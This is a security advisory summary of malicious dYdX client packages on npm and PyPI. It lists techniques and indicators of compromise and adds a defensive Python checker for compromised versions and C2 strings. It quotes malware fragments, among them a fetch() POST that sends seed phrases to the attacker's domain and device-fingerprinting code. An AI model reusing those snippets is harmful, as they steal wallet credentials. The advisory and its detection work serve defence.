Socket Threat Research discovered a coordinated supply chain attack that published malicious versions of the dYdX client libraries to npm and PyPI, embedding wallet-stealing credential exfiltration and, in the PyPI release, a Remote Access Trojan (RAT). The malicious packages exfiltrated seed phrases and device fingerprints to a typosquatting domain, and the PyPI release used a 100-iteration obfuscation layer to deploy a RAT capable of arbitrary code execution and persistent access.
Keypoints
- Socket flagged malicious behavior in compromised dYdX client packages on January 27, 2026, and notified dYdX on January 28, 2026.
- Compromised packages: npm @dydxprotocol/v4-client-js (multiple malicious versions) and PyPI dydx-v4-client (v1.1.5post1).
- npm payload: credential theft that exfiltrates seed phrases and device fingerprints; PyPI payload: same credential theft plus an obfuscated RAT enabling arbitrary code execution.
- Exfiltration and C2 infrastructure used a typosquatting domain (dydx[.]priceoracle[.]site) with endpoints /v4/price for credentials and /py for RAT commands.
- Malicious code was embedded into core package files (registry.ts/registry.js/account.py) and published using legitimate credentials, consistent with developer account compromise.
- Impact ranges from complete wallet compromise for npm victims to full system compromise, persistent backdoors, and remote code execution for PyPI victims; device fingerprinting enables tracking and targeting.
MITRE Techniques
- [T1195.002] Supply Chain Compromise – Malicious versions were published to package registries using legitimate publishing credentials, embedding malware inside core package files ('Multiple malicious versions were published simultaneously to both ecosystems using legitimate publishing credentials').
- [T1059.006] Command and Scripting Interpreter: Python – The PyPI RAT executes arbitrary Python code received from the C2 server in subprocesses ('The RAT allows threat actor to: Execute arbitrary Python code with user privileges').
- [T1071.001] Application Layer Protocol: Web Protocols – Exfiltration and C2 use HTTPS endpoints to send stolen credentials and receive commands ('await fetch("https://dydx[.]priceoracle[.]site/v4/price"').
- [T1027] Obfuscated Files or Information – The PyPI payload is obfuscated with 100 iterations of reverse, base64 decode, and zlib decompress before execution ('Apply 100 deobfuscation iterations').
- [T1082] System Information Discovery – Malware collects system identifiers (MAC, hostname, OS, machine-id) to build a device fingerprint used to correlate victims ('parts.push(getMacLikeUuidNode()); parts.push(os.hostname()); … parts.push(fs.readFileSync("/etc/machine-id", "utf8").trim());').
- [T1041] Exfiltration Over C2 Channel – Credential theft routines POST seed phrases and fingerprints to the attacker-controlled endpoint for collection ('await fetch("https://dydx[.]priceoracle[.]site/v4/price", { method: "POST", body: JSON.stringify({ phrase, "api-key": "dydx1gh6fj28w37rykqu6szgp9q0rzejslmj0umk55c", uid }) })').
- [T1005] Data from Local System – The RAT and credential-theft code read local files and sensitive data (e.g., /etc/machine-id, SSH keys, source code) for exfiltration ('parts.append(fs.readFileSync("/etc/machine-id", "utf8").trim())').
Indicators of Compromise
- [Domain] Malicious typosquatting infrastructure used for exfiltration and C2 – dydx[.]priceoracle[.]site (registered Jan 9, 2026), priceoracle[.]site.
- [HTTP Endpoints] Exfiltration and C2 paths – https://dydx[.]priceoracle[.]site/v4/price (credential exfiltration), https://dydx[.]priceoracle[.]site/py (RAT C2).
- [Packages] Malicious package names and ecosystems – npm: @dydxprotocol/v4-client-js, PyPI: dydx-v4-client.
- [Package Versions] Compromised releases – npm examples: v1.0.31, v1.15.2 (and additional malicious versions v1.22.1, v3.4.1), PyPI example: v1.1.5post1.
- [Hardcoded Credentials] Embedded keys and tokens used by malware – API key: dydx1gh6fj28w37rykqu6szgp9q0rzejslmj0umk55c; RAT auth token: 490CD9DAD3FAE1F59521C27A96B32F5D677DD41BF1F706A0BF85E69CA6EBFE75.
- [File Names] Malicious code locations within packages – registry.ts / registry.js (npm), account.py (PyPI), config.py and _bootstrap.py (PyPI RAT payload files).
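As an added triage example (not code from Socket's write-up or from the dYdX project), the following Python helper checks a package-lock.json and `pip freeze` output against the compromised versions listed above, and scans a package file's contents for the C2 domain and hardcoded keys from the IoC list. The lockfile, freeze lines and file snippet it ships with are constructed samples.

```python
import json
import re

# Compromised releases exactly as named in the IoC list above.
COMPROMISED_NPM = {"@dydxprotocol/v4-client-js": {"1.0.31", "1.15.2", "1.22.1", "3.4.1"}}
COMPROMISED_PYPI = {"dydx-v4-client": {"1.1.5post1"}}

# Strings from the IoC list; any of them inside an installed package file is a strong signal.
C2_PATTERNS = [
    re.compile(r"dydx\.priceoracle\.site", re.I),
    re.compile(r"dydx1gh6fj28w37rykqu6szgp9q0rzejslmj0umk55c"),
    re.compile(r"490CD9DAD3FAE1F59521C27A96B32F5D677DD41BF1F706A0BF85E69CA6EBFE75", re.I),
]

def check_npm_lock(lock_text):
    """(name, version) pairs in a lockfileVersion 2/3 package-lock.json that match a bad release."""
    hits = []
    for path, meta in json.loads(lock_text).get("packages", {}).items():
        # keys look like "node_modules/@scope/name" (possibly nested); keep the final package name
        name = path.rsplit("node_modules/", 1)[-1]
        if meta.get("version") in COMPROMISED_NPM.get(name, ()):
            hits.append((name, meta["version"]))
    return hits

def check_pip_freeze(freeze_lines):
    """(name, version) pairs from `pip freeze` output that match a bad release."""
    hits = []
    for line in freeze_lines:
        if "==" not in line:
            continue
        name, version = line.strip().split("==", 1)
        # installed metadata may carry the PEP 440 normalised form "1.1.5.post1";
        # fold ".post" back to "post" before comparing with the advisory's spelling
        if version.replace(".post", "post") in COMPROMISED_PYPI.get(name.lower().replace("_", "-"), ()):
            hits.append((name, version))
    return hits

def scan_text_for_c2(text):
    """Distinct indicator strings found in a file's contents (e.g. registry.js or account.py)."""
    return sorted({m.group(0) for p in C2_PATTERNS for m in p.finditer(text)})

# Constructed samples (not real artefacts) so the checks can be exercised offline.
SAMPLE_LOCK = json.dumps({"packages": {
    "": {"name": "app"},
    "node_modules/@dydxprotocol/v4-client-js": {"version": "1.15.2"},
    "node_modules/left-pad": {"version": "1.3.0"},
}})
SAMPLE_FREEZE = ["requests==2.31.0", "dydx-v4-client==1.1.5.post1"]
SAMPLE_REGISTRY_JS = 'await fetch("https://dydx.priceoracle.site/v4/price", { method: "POST" })'
```

Run `scan_text_for_c2` over every file under node_modules/@dydxprotocol and the installed dydx_v4_client package, since the advisory notes the payload lives in registry.js / account.py rather than in package metadata.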
Read more: https://socket.dev/blog/malicious-dydx-packages-published-to-npm-and-pypi